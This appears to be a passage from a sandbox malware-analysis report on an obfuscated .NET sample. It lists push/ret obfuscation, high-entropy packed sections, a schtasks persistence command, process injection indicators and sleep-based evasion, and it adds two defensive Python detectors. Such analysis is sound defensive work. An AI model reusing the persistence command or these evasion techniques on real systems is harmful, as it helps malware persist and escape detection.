            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00418DA5 pushfd ; retf | 6_2_00418DA7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0040CEFA push cs; retf | 6_2_0040CEFB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00411E90 push C033AE35h; ret | 6_2_00411E95
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E09AD push ecx; mov dword ptr [esp], ecx | 6_2_014E09B6
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Code function: 7_2_07BBD63D push FFFFFF8Bh; iretd | 7_2_07BBD63F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_0111C06D push edi; ret | 13_2_0111C06F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_010A1366 push eax; iretd | 13_2_010A1369
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_0111C54D pushfd ; ret | 13_2_0111C54E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_0111C54F push 8B010A67h; ret | 13_2_0111C554
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_010D09AD push ecx; mov dword ptr [esp], ecx | 13_2_010D09B6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_0111C9D7 push edi; ret | 13_2_0111C9D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_0111BF38 push edi; ret | 13_2_0111BF3A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_010A1FEC push eax; iretd | 13_2_010A1FED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_01120E7F push edi; ret | 13_2_01120E81
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_0111BEAD push edi; ret | 13_2_0111BEAF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_0111BECE push edi; ret | 13_2_0111BEE0
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | Code function: 16_2_0329F24F push ss; ret | 16_2_0329F282
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | Code function: 16_2_03287AEA push es; iretd | 16_2_03287AEB
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | Code function: 16_2_03292055 push C033AE35h; ret | 16_2_0329205A
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | Code function: 16_2_0328D0BF push cs; retf | 16_2_0328D0C0
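            The rows above are push/return pairs. A `push imm32; ret` is a disguised `jmp imm32` and a `push reg; ret` a disguised `jmp reg`: the return pops whatever was just pushed as its target, so a linear disassembler sees a function end where execution actually continues. Pairs such as `pushfd; retf` or `push ss; ret` cannot execute meaningfully at all and are what a linear sweep produces when it walks packed or encrypted bytes as if they were code, which is itself a symptom of the obfuscation this section reports. The scanner below is an added example, not part of the Joe Sandbox report or the sample: it finds such pairs in a raw code blob and decodes the pushed target. The blob is hand assembled from the instruction forms listed in the rows (including the `6A 8B CF` encoding that disassembles as `push FFFFFF8Bh; iretd`), not copied from the sample, and the base address 0x401000 is an assumption.

```python
"""Find push/ret control-flow gadgets in raw x86 code.

Added example, not part of the Joe Sandbox report. SAMPLE_CODE is hand
assembled from the instruction forms the report lists (push imm; ret,
push reg; ret, pushfd; retf, push seg; retf) and is not bytes from the
sample; the base address 0x401000 is likewise an assumption.
"""
import struct

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
SEG_PUSH = {0x06: "push es", 0x0E: "push cs", 0x16: "push ss", 0x1E: "push ds"}
RET_1 = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}      # one-byte return forms
RET_3 = {0xC2: "ret", 0xCA: "retf"}                      # return with imm16 stack adjust


def ret_at(code, i):
    """Return (mnemonic, length) if a ret-family instruction starts at i, else None."""
    if i >= len(code):
        return None
    op = code[i]
    if op in RET_1:
        return RET_1[op], 1
    if op in RET_3 and i + 3 <= len(code):
        imm = struct.unpack_from("<H", code, i + 1)[0]
        return f"{RET_3[op]} {imm:X}h", 3
    return None


def decode_push(code, i):
    """Decode a push-like instruction at i: (mnemonic, length, pushed value or None)."""
    op = code[i]
    if op == 0x68 and i + 5 <= len(code):               # push imm32
        val = struct.unpack_from("<I", code, i + 1)[0]
        return f"push {val:08X}h", 5, val
    if op == 0x6A and i + 2 <= len(code):               # push imm8, sign-extended to 32 bits
        val = struct.unpack_from("<b", code, i + 1)[0] & 0xFFFFFFFF
        return f"push {val:08X}h", 2, val
    if 0x50 <= op <= 0x57:                              # push r32
        return f"push {REGS[op - 0x50]}", 1, None
    if op in SEG_PUSH:                                  # push segment register
        return SEG_PUSH[op], 1, None
    if op == 0x9C:
        return "pushfd", 1, None
    if op == 0x60:
        return "pushad", 1, None
    return None


def find_push_ret(code, base=0):
    """Linear byte scan for a push immediately followed by a return.

    A linear sweep is a heuristic, not a disassembler: immediates and data can
    yield spurious pairs, so treat the hits as leads to confirm in a debugger.
    """
    hits, i = [], 0
    while i < len(code):
        push = decode_push(code, i)
        if push:
            mnemonic, length, target = push
            ret = ret_at(code, i + length)
            if ret:
                hits.append({"offset": base + i, "push": mnemonic,
                             "ret": ret[0], "target": target})
                i += length + ret[1]
                continue
        i += 1
    return hits


# Constructed blob, not bytes from the sample.
SAMPLE_CODE = bytes.fromhex(
    "55 8B EC"             # push ebp; mov ebp, esp      (ordinary prologue, no hit)
    "6A 8B CF"             # push FFFFFF8Bh; iretd       (the report's first row form)
    "90 90"                # nop; nop
    "68 68 A5 0E 38 C3"    # push 380EA568h; ret         (disguised jmp 380EA568h)
    "52 CA 11 D0"          # push edx; retf D011h
    "9C CB"                # pushfd; retf
    "0E CB"                # push cs; retf
    "33 C0 C3"             # xor eax, eax; ret           (plain return, no push before it)
)

if __name__ == "__main__":
    for h in find_push_ret(SAMPLE_CODE, base=0x401000):
        tgt = "" if h["target"] is None else f" -> {h['target']:08X}"
        print(f"{h['offset']:08X} {h['push']}; {h['ret']}{tgt}")
```

            Only the immediate forms carry a recoverable target; for a register or flags push the target is whatever the register holds at runtime, which is why those rows cannot be resolved statically.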
            Source: JeouiaPf03mHSBH.exe | Static PE information: section name: .text entropy: 7.885103240467522
            Source: snTlRrBza.exe.0.dr | Static PE information: section name: .text entropy: 7.885103240467522
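            The two rows above measure the .text section of the sample and of its dropped copy at 7.885 bits per byte, close to the 8-bit ceiling of uniformly random data, which is what compressed or encrypted payloads look like on disk (the Assembly.Load(byte[]) rows earlier in this section are where such a payload is handed to the .NET loader in memory). The identical value, together with the shared RAwd.pdb string, is consistent with snTlRrBza.exe being a copy of the sample. The rows that follow apply the same measure to identifiers: generated method names such as 'VZUqjyYCR1' have far higher character entropy when concatenated than ordinary .NET names. The following Python is an added example, not part of the Joe Sandbox report: a minimal PE section-table walk that computes per-section entropy, the same measure over concatenated method names, and a constructed PE image and name lists to run it on. The 7.5-bit section threshold and 4.8-bit name threshold are assumptions, not values the report states.

```python
"""Entropy heuristics behind the ".text entropy" and "high entropy of
concatenated method names" rows.

Added example, not part of the Joe Sandbox report. The PE image and the
method-name lists are constructed for the demonstration; the 7.5-bit section
threshold and the 4.8-bit name threshold are assumptions, not values stated
by the report (it prints only the measured 7.885 bits for .text).
"""
import hashlib
import math
import struct
from collections import Counter


def shannon_entropy(data):
    """Bits per symbol over a bytes/str sequence; 8.0 is the byte maximum."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_section_entropies(image):
    """Walk the PE section table and return {name: (raw_size, entropy)}."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    pe = struct.unpack_from("<I", image, 0x3C)[0]             # e_lfanew
    if image[pe:pe + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    nsections = struct.unpack_from("<H", image, pe + 6)[0]     # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", image, pe + 20)[0]     # COFF SizeOfOptionalHeader
    table = pe + 24 + opt_size                                 # first IMAGE_SECTION_HEADER
    result = {}
    for k in range(nsections):
        off = table + 40 * k
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", image, off + 16)   # SizeOfRawData, PointerToRawData
        result[name] = (raw_size, shannon_entropy(image[raw_ptr:raw_ptr + raw_size]))
    return result


def packed_sections(image, threshold=7.5):
    """Names of sections whose raw bytes look compressed or encrypted (assumed threshold)."""
    return [n for n, (size, ent) in pe_section_entropies(image).items() if size and ent >= threshold]


def method_name_entropy(names):
    """Entropy of the concatenated identifiers, the measure the report's rows use."""
    return shannon_entropy("".join(names).encode())


def obfuscated_names(names, threshold=4.8):
    """True when the identifiers look generated rather than written (assumed threshold)."""
    return method_name_entropy(names) >= threshold


def pseudo_random_bytes(n, seed=b"demo"):
    """Deterministic high-entropy filler standing in for packed code (constructed)."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


def build_sample_pe(sections):
    """Construct a minimal, non-runnable PE32 image with the given {name: bytes}
    sections: just enough header for the section-table walk above."""
    pe_off, opt_size, n = 0x40, 0xE0, len(sections)
    raw_ptr = (pe_off + 24 + opt_size + 40 * n + 0x1FF) & ~0x1FF       # 512-byte file alignment
    hdr = bytearray(b"MZ".ljust(0x3C, b"\0")) + struct.pack("<I", pe_off)
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, opt_size, 0x102)
    hdr += struct.pack("<H", 0x10B) + bytes(opt_size - 2)               # PE32 magic, rest zero
    body, va = bytearray(), 0x1000
    for name, data in sections.items():
        hdr += struct.pack("<8sIIIIIIHHI", name.encode(), len(data), va, len(data),
                           raw_ptr + len(body), 0, 0, 0, 0, 0x60000020)
        body += data
        va += 0x1000
    return bytes(hdr.ljust(raw_ptr, b"\0") + body)


# Constructed inputs: a packed-looking .text beside a plain .rdata, and the
# generated identifier style shown in the report's rows beside ordinary names.
SAMPLE_IMAGE = build_sample_pe({".text": pseudo_random_bytes(4096),
                                ".rdata": b"plain strings\0" * 100})
OBFUSCATED_NAMES = ["VZUqjyYCR1", "AVmqwM9nI5", "qaoqIKhr2W", "m5oqE5ghbR", "Sq7qJICCCU",
                    "wbLqskj9IG", "ArCqruJZWu", "B1Fq8BJNPV", "vghqDBWamN", "JVnqUTt0Qg"]
PLAIN_NAMES = ["CanConvertFrom", "ConvertFrom", "ConvertTo", "ToString", "Dispose"]

if __name__ == "__main__":
    for name, (size, ent) in pe_section_entropies(SAMPLE_IMAGE).items():
        print(f"{name:8} {size:6d} bytes  entropy {ent:.3f}")
    print("packed:", packed_sections(SAMPLE_IMAGE))
    print(f"generated names: {method_name_entropy(OBFUSCATED_NAMES):.2f} bits, "
          f"plain names: {method_name_entropy(PLAIN_NAMES):.2f} bits")
```

            Entropy alone does not separate a packer from legitimately compressed resources or embedded certificates, so the section check is a triage signal to pair with the loader behaviour (Assembly.Load(byte[]), the injection signatures) rather than a verdict on its own.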
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, xuMyoRtLSwKEbYyOZUV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KmanmUN8YL', 'slCntFCRP1', 'DGVnkhMcT2', 'WYan3Iku3G', 'c9TnHF8UNW', 'yK5n2WtmH8', 'M9VnfiLSQ6'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, eSNV4R7L83U8700pLS.csHigh entropy of concatenated method names: 'MtcRM9bVic', 'ER3RKPhse6', 'zubRm0OPSY', 'OkyRtdaFLg', 'woXRyfgb99', 'Q5bR6hkon6', 'ppbRcX6GU8', 'wefRoKFYXZ', 'whKRLxrp83', 'LoaRxgykcu'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, Ir9XX8BGVgqJqqBrpk.csHigh entropy of concatenated method names: 'ECUAreMA4w', 'vSUA8cEuOv', 'lKEAUl719V', 'cbxAXWWNkD', 'S7uARD57aH', 'rKuA1NGB9N', 'sx4f5L1iFwUIOxrdu9', 'FSlhgyladT20To6lNg', 'kqwAAymbYP', 'RCfAqlvjMe'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, g0YyKflPy8yK9w4w4q.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'WdRV0fBINl', 'E77VCFWqHB', 'kppVzGGeNi', 'lWbqGLaBsp', 'JrhqAWOIbR', 'AffqVob2na', 'n3Mqq5Ugf4', 'SUwLj23DCSaFwCid0cw'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, xW2e2hhdjSEZvnPwMJ.csHigh entropy of concatenated method names: 'pkyPploLV', 'jHt7Xl4FE', 'V0J9yZNMC', 'oyhi8Tgs5', 'L8AB3U1EA', 'YnkF5CwJm', 'H1F04HXMpEwZ78Gcy4', 'Y8OUtKwlGgGQcldjGC', 'dGyO6RtG4', 'w5cnaaqiq'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, L3orJ2zu7nl0jhEWia.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Ob0h40Y2WA', 'pkQhR9NCW3', 'A1Wh1J4N9T', 'v8AhNDcABZ', 'x2ChOGPWGx', 'NqthhA085q', 'ppHhnnWd72'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, QXr51diiCwgGVrSkMt.csHigh entropy of concatenated method names: 'ovNrY2eA39', 'B6urZg286R', 'YcArPUop1n', 'C0Yr7QAbJM', 'yVcrSbLl7X', 'vder9EuKB8', 'N8NriBkkgy', 'kewrTFBaFd', 'VmrrBML0PE', 'HpZrFdW5Ie'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, WTlef4eAPctGxvi0QH.csHigh entropy of concatenated method names: 'ToString', 'z6y1bSCR37', 'U051yYEgum', 'e9D16bGWZ2', 'Uks1c9QiJJ', 'iG61oaxI4K', 'duN1LY8bCW', 'VsQ1x9Vqds', 'JOv1a3LuhF', 'tjQ1uXouSI'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, Ckc4Bt89d71YMmb0gd.csHigh entropy of concatenated method names: 'VZUqjyYCR1', 'AVmqwM9nI5', 'qaoqIKhr2W', 'm5oqE5ghbR', 'Sq7qJICCCU', 'wbLqskj9IG', 'ArCqruJZWu', 'B1Fq8BJNPV', 'vghqDBWamN', 'JVnqUTt0Qg'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, upI346SlGxxHgqWU2Z.csHigh entropy of concatenated method names: 'RefImHudQi', 'wQXIt8PNw7', 'yLoIkLH2ag', 'AG9I3ZMigM', 'GicIHRIj8A', 'Ky6I2kNiXA', 'zoaIfYtOE9', 'dnUIvpgmyw', 'zWYI0t26Z8', 'ilFIC8Gj1e'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, N4Ll5GXUfMH1RvWFIe.csHigh entropy of concatenated method names: 'THSOwucHsu', 'uFkOIAalH3', 'dcLOEjy1AI', 'J0kOJQlr47', 'YmOOsko1dy', 'KUEOr8I0eN', 'knJO8IFVPL', 'wskODm7qLr', 'RTuOUv777R', 'JSnOXyXsUn'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, EhHNmbwysvM5y7Q7NK.csHigh entropy of concatenated method names: 'Dispose', 'cAJA0FoScx', 't0XVyWAYyO', 'cueQQhtewL', 'iAfACmHiEl', 'bv4AzZtX4i', 'ProcessDialogKey', 'JdGVG7ZuRL', 'YqmVAOVnTh', 'pc4VVV03g6'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, KdbVMg3oVedipeWcRs.csHigh entropy of concatenated method names: 'ASrE7N6av3', 'XTpE9kBpqi', 'RpvETaBDqf', 'BleEBJFivm', 'FDDERubRAj', 'm52E18Uxi6', 'Yn2ENTBN02', 'EJSEO5rH4w', 'bbFEh6Res1', 'CXHEnm0v5H'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, zQBAkGmM1gWTxtBe8p.csHigh entropy of concatenated method names: 'yEPOlKk3yT', 'XMeOyIb1xr', 'qBMO6dUWce', 'YPJOcD6wT0', 'xrGOmhVGa6', 'I07OolUhgu', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, uJSmQAkIQdAqhIUfEM.csHigh entropy of concatenated method names: 'qcArw02tTS', 'WuhrE4PP3I', 'MmIrsjWcJl', 'XxBsCqZ04n', 'cduszkwOrX', 'npNrGvSA0b', 'LEUrAoZQik', 'DburVRMkv7', 'iCBrqZgLFP', 'qvYr5iFCrk'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, En9Hs2FGUX7pUj1W3H.csHigh entropy of concatenated method names: 'sIxsjMBhsk', 'zDysIPLPWM', 'XnusJQp43l', 'bdLsrlqJUt', 'YANs8PxbHZ', 'nZ1JHqhShR', 'wWLJ2egeGi', 'gifJfSN5iY', 'VKCJv5S3Dq', 'gVHJ0d8Zg5'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, dw3ZvYWG4S3ZxXG1Ra.csHigh entropy of concatenated method names: 'mk7hAdwjCo', 'diAhqxKTuw', 'hSuh5nEK4U', 'PNFhw6MfBa', 'o94hIb1QBw', 'ziJhJbU4ku', 'YdThsnSQud', 'qayOfrDUUa', 'DVdOvC1WN0', 'okIO09cAQs'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, tpjUdVuctmg3J3VYWu.csHigh entropy of concatenated method names: 'Xua4TRCSDm', 'uAU4BrG6yG', 'ed74lbsOq7', 'PCD4yZtL1C', 'ily4cyVxSN', 'PrF4oywRMv', 'G834xFxQJV', 'A524anN0or', 'cfa4MEl0uH', 'U9v4blVbNG'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, Gs7da6tvYi6y250LyZF.csHigh entropy of concatenated method names: 'zpFhYrNoNx', 'b6ghZnOKx1', 'UYChPoS7HD', 'iQjh7DNDcS', 'IQjhSUj8Je', 'uN5h9y4oQq', 'ylThif8aIl', 'fmUhTVDZDX', 'ugchBVSq3p', 'UPshFoxFDq'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, pWe3CFoJYBpwqoFcvk.csHigh entropy of concatenated method names: 'X2YJS7nG9G', 'iPOJiE0YSB', 'xduE6Vg2Lp', 'jrGEc7Ece4', 'skGEonossi', 'XSOEL9h12p', 'XLCExnkK47', 'c7jEaSBggH', 'OmDEuctc5a', 'yJxEMjYCcZ'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, P4EZ97PrnE5AKAeyrT.csHigh entropy of concatenated method names: 'TP4NvITvAh', 'H5JNCo5R7f', 'pqYOGX8pxs', 'gxCOAQOWc0', 'nTtNbk9ZDj', 'C2tNK6jCV5', 'gEXNdZPvb0', 'OBaNmWjeql', 'uJBNtW5JPM', 'G9nNkJvnw0'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, xuMyoRtLSwKEbYyOZUV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KmanmUN8YL', 'slCntFCRP1', 'DGVnkhMcT2', 'WYan3Iku3G', 'c9TnHF8UNW', 'yK5n2WtmH8', 'M9VnfiLSQ6'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, eSNV4R7L83U8700pLS.csHigh entropy of concatenated method names: 'MtcRM9bVic', 'ER3RKPhse6', 'zubRm0OPSY', 'OkyRtdaFLg', 'woXRyfgb99', 'Q5bR6hkon6', 'ppbRcX6GU8', 'wefRoKFYXZ', 'whKRLxrp83', 'LoaRxgykcu'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, Ir9XX8BGVgqJqqBrpk.csHigh entropy of concatenated method names: 'ECUAreMA4w', 'vSUA8cEuOv', 'lKEAUl719V', 'cbxAXWWNkD', 'S7uARD57aH', 'rKuA1NGB9N', 'sx4f5L1iFwUIOxrdu9', 'FSlhgyladT20To6lNg', 'kqwAAymbYP', 'RCfAqlvjMe'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, g0YyKflPy8yK9w4w4q.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'WdRV0fBINl', 'E77VCFWqHB', 'kppVzGGeNi', 'lWbqGLaBsp', 'JrhqAWOIbR', 'AffqVob2na', 'n3Mqq5Ugf4', 'SUwLj23DCSaFwCid0cw'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, xW2e2hhdjSEZvnPwMJ.csHigh entropy of concatenated method names: 'pkyPploLV', 'jHt7Xl4FE', 'V0J9yZNMC', 'oyhi8Tgs5', 'L8AB3U1EA', 'YnkF5CwJm', 'H1F04HXMpEwZ78Gcy4', 'Y8OUtKwlGgGQcldjGC', 'dGyO6RtG4', 'w5cnaaqiq'
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, L3orJ2zu7nl0jhEWia.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Ob0h40Y2WA', 'pkQhR9NCW3', 'A1Wh1J4N9T', 'v8AhNDcABZ', 'x2ChOGPWGx', 'NqthhA085q', 'ppHhnnWd72'
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe File created: C:\Users\user\AppData\Roaming\snTlRrBza.exe

            Boot Survival

            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpA933.tmp"

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match, File source: Process Memory Space: JeouiaPf03mHSBH.exe PID: 7080, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: snTlRrBza.exe PID: 7260, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\SearchIndexer.exe API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\SearchIndexer.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\SearchIndexer.exe API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\SearchIndexer.exe API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\SearchIndexer.exe API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\SearchIndexer.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\SearchIndexer.exe API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\SearchIndexer.exe API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe Memory allocated: 3210000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe Memory allocated: 3420000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe Memory allocated: 3260000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe Memory allocated: 99F0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe Memory allocated: A9F0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe Memory allocated: AC10000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe Memory allocated: BC10000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe Memory allocated: 2F20000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe Memory allocated: 3210000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe Memory allocated: 5210000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe Memory allocated: 9420000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe Memory allocated: A420000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe Memory allocated: A630000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe Memory allocated: B630000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0152096E rdtsc 6_2_0152096E
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6622
            Source: C:\Windows\SysWOW64\SearchIndexer.exe Window / User API: threadDelayed 9751
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 0.7 %
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 0.4 %
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe TID: 7156 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7268 Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7248 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe TID: 7288 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\SearchIndexer.exe TID: 7904 Thread sleep count: 220 > 30
            Source: C:\Windows\SysWOW64\SearchIndexer.exe TID: 7904 Thread sleep time: -440000s >= -30000s
            Source: C:\Windows\SysWOW64\SearchIndexer.exe TID: 7904 Thread sleep count: 9751 > 30
            Source: C:\Windows\SysWOW64\SearchIndexer.exe TID: 7904 Thread sleep time: -19502000s >= -30000s
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe TID: 7944 Thread sleep time: -40000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\SearchIndexer.exe Last function: Thread delayed
